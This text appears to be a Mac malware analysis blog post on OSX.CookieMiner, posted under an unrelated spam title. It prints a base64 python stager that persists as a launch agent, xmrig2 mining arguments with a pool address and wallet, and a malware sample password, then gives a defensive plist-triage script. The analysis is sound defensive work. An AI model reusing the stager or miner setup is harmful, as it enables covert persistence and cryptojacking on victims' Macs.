
Stockfolio mac download free





I’d personally like to thank the following organizations, groups, and researchers for their work, analysis, & assistance! 🙏🏻 This includes the “malwareland” channel on the MacAdmins slack, and others who choose to remain unnamed.

Throughout this blog, we’ll reference various tools used in analyzing the malware specimens:

- Our user-mode (open-source) utility that monitors process creations and terminations, providing detailed information about such events.
- Our user-mode (open-source) utility that monitors file events (such as creations, modifications, and deletions), providing detailed information about such events.
- Our (open-source) utility that displays code-signing information, via the UI.
- A “reverse engineering tool (for macOS) that lets you disassemble, decompile and debug your applications” …or malware specimens!
- lldb: the de-facto command-line debugger for macOS. Installed (to /usr/bin/lldb) as part of Xcode.

If you’re interested in general Mac malware analysis techniques, check out the following resources:

- “How to Reverse Malware on macOS Without Getting Infected”
- “Lets Play Doctor: Practical OSX Malware Detection & Analysis”

CookieMiner is a cryptominer that also steals user cookies and passwords, likely to give attackers access to victims’ online accounts and wallets.

Download: OSX.CookieMiner (password: infect3d)

Writeups:

- “Mac Malware Steals Cryptocurrency Exchanges’ Cookies”
- “Mac ‘CookieMiner’ Malware Aims to Gobble Crypto Funds”

Infection Vector: Unknown

Unit 42 (of Palo Alto Networks), who uncovered CookieMiner and wrote the original report on the malware, made no mention of the malware’s initial infection vector. However, a ThreatPost writeup states that:

“[The] deputy director of Threat Intelligence for Unit 42 told Threatpost that researchers are not certain how victims are first infected by the shell script, but they suspect victims download a malicious program from a third-party store.”

…as such, CookieMiner’s infection vector remains unknown.

Persistence: Launch Agent

As noted in Unit 42’s report, `CookieMiner` persists two launch agents. This is performed during the first stage of the infection, via a shell script named `uploadminer.sh`. One of the property lists it installs runs a python one-liner that base64-decodes and `exec`s an embedded script (keys and values shown; the Label value and the middle of the blob are elided):

```
Label
    …
ProgramArguments
    python
    -c
    import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode(
    'aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml
    …
    hcileU1soU1tpXStTW2pdKSUyNTZdKSkKZXhlYygnJy5qb2luKG91dCkp'))
```

Decoding the visible prefix of the blob gives `import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Sni`, that is, the stage begins by checking whether the Little Snitch firewall is running before it does anything else.

Does this look familiar? Yes! In fact this is exactly how OSX.DarthMiner persisted. As the RunAtLoad key is set to true in this property list as well, the python commands will be automatically (re)executed each time the user logs in.

Capabilities: Cryptomining, Cookie/Password Stealing, Backdoor

CookieMiner is likely the evolution of OSX.DarthMiner. (We also covered OSX.DarthMiner in our “The Mac Malware of 2018” report.) This is not a coincidence, as was noted in the Unit 42 report: “[CookieMiner] has been developed from OSX.DarthMiner, a malware known to target the Mac platform.”

In our “The Mac Malware of 2018” report we noted that DarthMiner persists the well-known Empyre backdoor and a cryptocurrency mining binary named XMRig, each via its own launch agent property list. CookieMiner does this as well (though a 2 has been added to both the mining binary and its plist). By examining the arguments passed to the persistent miner binary, xmrig2, it appears to be mining the Koto cryptocurrency:

```
ProgramArguments
    /Users/Shared/xmrig2
    -a
    yescrypt
    -o
    stratum+tcp://koto-pool.work:3032
    -u
    k1GqvkK7QYEfMj3JPHieBo1m
```

The persistently installed Empyre backdoor allows remote attackers to run arbitrary commands on an infected host.

The most interesting aspect of CookieMiner (and what differentiates it from OSX.DarthMiner) is its propensity for stealing! During their comprehensive analysis, Unit 42 researchers highlighted the fact that CookieMiner captures and exfiltrates web cookies, login credentials (passwords), and SMS data. These cookie, password, and message stealing capabilities are (likely) implemented to allow attackers to bypass 2FA protections on victims’ online cryptocurrency accounts:

“By leveraging the combination of stolen login credentials, web cookies, and SMS data, based on past attacks like this, we believe the bad actors could bypass multi-factor authentication for these sites. If successful, the attackers would have full access to the victim's exchange account and/or wallet and be able to use those funds as if they were the user themselves.” -Unit 42
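As an added example (this is not Objective-See's code and not part of CookieMiner or its scripts), the Python below triages a launch agent property list for the two persistence patterns discussed above: the `python -c` one-liner that `exec`s a base64 blob, and the `xmrig2` invocation that names a stratum pool and lives in the world-writable `/Users/Shared`. Instead of running the blob, it decodes it so an analyst can read the first stage. The plists built in `_sample_plists()` are constructed for this example; the `Label` values and the inner python payload are placeholders, not the malware's real values. Only the standard library is used.

```python
"""Launch-agent triage for the persistence patterns described above.

Added example, not Objective-See's tooling. Reports:
  * a `python -c` one-liner whose body is exec(base64.b64decode(...)), and the
    decoded contents of that blob (read it, do not run it);
  * ProgramArguments naming a stratum mining pool or an executable under
    /Users/Shared (the xmrig2 pattern);
  * whether RunAtLoad is set, i.e. the agent re-runs at every login.
"""
import base64
import plistlib
import re
from typing import Dict, List, Optional

# Captures the quoted literal inside base64.b64decode('...').
_B64_LITERAL = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
_STRATUM = re.compile(r"^stratum\+(tcp|ssl|tls)://", re.IGNORECASE)


def decode_stager(one_liner: str) -> Optional[str]:
    """Return the python hidden inside exec(base64.b64decode('...')), or None."""
    match = _B64_LITERAL.search(one_liner)
    if not match:
        return None
    blob = match.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate padding stripped by a log or scraper
    try:
        return base64.b64decode(blob).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def triage_launch_agent(plist_bytes: bytes) -> Dict[str, object]:
    """Parse one launchd plist and return the indicators found in it."""
    plist = plistlib.loads(plist_bytes)
    args: List[str] = [str(a) for a in plist.get("ProgramArguments", [])]
    indicators: List[str] = []
    decoded: Optional[str] = None

    # Pattern 1: python -c '<stager>' with an exec(base64.b64decode(...)) body.
    if len(args) >= 3 and args[0].rsplit("/", 1)[-1].startswith("python") and args[1] == "-c":
        indicators.append("python -c one-liner")
        if "b64decode" in args[2] and "exec(" in args[2]:
            indicators.append("base64 exec stager")
            decoded = decode_stager(args[2])

    # Pattern 2: miner invocation (stratum pool URL, binary dropped in /Users/Shared).
    for arg in args:
        if _STRATUM.match(arg):
            indicators.append(f"stratum mining pool: {arg}")
    if args and args[0].startswith("/Users/Shared/"):
        indicators.append(f"executable in /Users/Shared: {args[0]}")

    run_at_load = bool(plist.get("RunAtLoad", False))
    if run_at_load and indicators:
        indicators.append("RunAtLoad=true: re-executed at every login")

    return {
        "label": plist.get("Label"),
        "run_at_load": run_at_load,
        "indicators": indicators,
        "decoded_stager": decoded,
    }


def _sample_plists() -> Dict[str, bytes]:
    """Constructed samples shaped like the two agents above (labels are placeholders)."""
    # Stand-in inner stage: the real blob starts with a `ps -ef | grep Little\ Snitch`
    # check; this placeholder does that and nothing else.
    stage = 'import subprocess;out = subprocess.check_output("ps -ef | grep Little\\ Snitch", shell=True)'
    blob = base64.b64encode(stage.encode()).decode()
    python_agent = plistlib.dumps({
        "Label": "com.example.stager",  # placeholder, not the malware's label
        "ProgramArguments": [
            "python", "-c",
            f"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('{blob}'))",
        ],
        "RunAtLoad": True,
    })
    miner_agent = plistlib.dumps({
        "Label": "com.example.rig2",  # placeholder, not the malware's label
        "ProgramArguments": ["/Users/Shared/xmrig2", "-a", "yescrypt",
                             "-o", "stratum+tcp://koto-pool.work:3032",
                             "-u", "k1GqvkK7QYEfMj3JPHieBo1m"],
        "RunAtLoad": True,
    })
    return {"stager": python_agent, "miner": miner_agent}


if __name__ == "__main__":
    for name, data in _sample_plists().items():
        report = triage_launch_agent(data)
        print(name, report["label"], report["indicators"])
        if report["decoded_stager"]:
            print("  decoded stage:", report["decoded_stager"])
```

Point it at the files under `~/Library/LaunchAgents` and `/Library/LaunchAgents` by replacing `_sample_plists()` with `open(path, "rb").read()`. The decode step is the important one: a `python -c ... exec(base64.b64decode(...))` agent with `RunAtLoad` is the DarthMiner/CookieMiner stager shape regardless of what the blob contains, and reading the decoded text tells you what the first stage checks for (here, Little Snitch) without executing it.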





